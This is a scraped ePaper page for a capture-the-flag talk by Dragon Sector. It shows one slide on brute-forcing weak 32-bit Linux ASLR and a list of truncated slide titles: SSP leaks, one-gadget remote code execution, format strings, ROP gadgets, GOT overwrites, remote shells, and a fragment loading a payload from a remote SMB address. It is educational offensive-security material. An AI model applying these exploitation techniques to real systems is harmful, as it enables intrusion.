dragons_ctf

Recommendations

Info

Brute-forcing ASLR • ASLR on popular 32-bit Linux distributions (e.g. Ubuntu) is inherently weak. – ≤12 bits of main image base address entropy. – ≤12 bits of libc image base address entropy. – ≤12 bits of heap allocation entropy. • Remote exploitation tasks can withstand multiple attempts. • 4096 is definitely doable over the course of several minutes / hours.
Page 1 and 2:
Pwning (sometimes) with style Drago
Page 3 and 4:
Dragon Sector? Insomni'hack 2014 Ge
Page 5 and 6:
Agenda
Page 7 and 8:
The SSP leak • Stack Smashing Pro
Page 9 and 10:
SSP basics - canary verification
Page 11 and 12:
__stack_chk_fail *** stack smashing
Page 13 and 14:
__stack_chk_fail void __attribute__
Page 15 and 16:
The argv array is at the top of the
Page 17 and 18:
We can overwrite it, too! $ ./test_
Page 19 and 20:
Very powerful memory disclosure •
Page 21:
References 1. Dan Rosenberg, Fun wi
Page 24 and 25:
Remote KG Task: Given a PCAP file,
Page 26 and 27:
Remote KG So… what is this protoc
Page 28 and 29:
Remote KG Next steps: ● write a p
Page 30:
JS Puzzle Event: Organizers: SECCON
Page 34 and 35:
One-gadget RCE on Linux • Assumin
Page 36 and 37:
One-gadget RCE on Linux • An exec
Page 38 and 39:
One-gadget RCE on Linux If std{out,
Page 40 and 41: I/O redirection /bin/sh &N • By d
Page 42 and 43: One-gadget RCE on Windows • In GN
Page 44 and 45: One-gadget RCE on Windows • There
Page 46: LoadLibrary(“\\11.22.33.44\payloa
Page 49 and 50: zfs Problem 1: Nothing wants to mou
Page 52 and 53: zfs ● xor_key ● key.xor_encrypt
Page 54 and 55: zfs ● Gynvael’s way: Brute forc
Page 56 and 57: zfs Minimizing input - assume that
Page 58 and 59: zfs
Page 60 and 61: zfs
Page 64 and 65: And about system()… • How do we
Page 66 and 67: Getting remote shell • Otherwise,
Page 68 and 69: With this, we can… • Leak the a
Page 70 and 71: libcdb.com
Page 72 and 73: There’s another way, too • If w
Page 74: Other teams do it, as well Quote fr
Page 77 and 78: World Wide Something ^_- TL;DR: .pc
Page 79 and 80: World Wide Something ^_- Let's recr
Page 82 and 83: ROP gadgets near libc imports • E
Page 84 and 85: ROP gadgets near libc imports • 1
Page 86 and 87: ROP gadgets near libc imports • S
Page 88 and 89: Partial .got.plt overwrites • If
Page 93 and 94: Format String Fun We all know and l
Page 95 and 96: Even More Format String Fun! No con
Page 97 and 98: Even More Format String Fun! printf
Page 99: Even More Format String Fun! Additi
Page 102 and 103: Getting read / recv to fail • Sce
Page 104 and 105: One-sided connection termination Fr
Page 107 and 108: Mumble Mumble Event: Boston Key Par
Page 109 and 110: Mumble Mumble What is Mumble? ● o
Page 111 and 112: Mumble Mumble Approach change: 1. A
Page 113 and 114: Mumble Mumble …
Page 115: Mumble Mumble ...- -... .-. -- -.--
Page 118 and 119: Instrumentation can help us • Typ
Page 120 and 121: 0x90 • The task was a 64-bit ELF
Page 122 and 123: 0x90 if (RAX == 10000000000000LL) {
Page 124 and 125: It worked!
Page 126: Questions? @j00ru http://j00ru.vexi
show all

dragons_ctf

Create successful ePaper yourself

Delete template?

Save as template?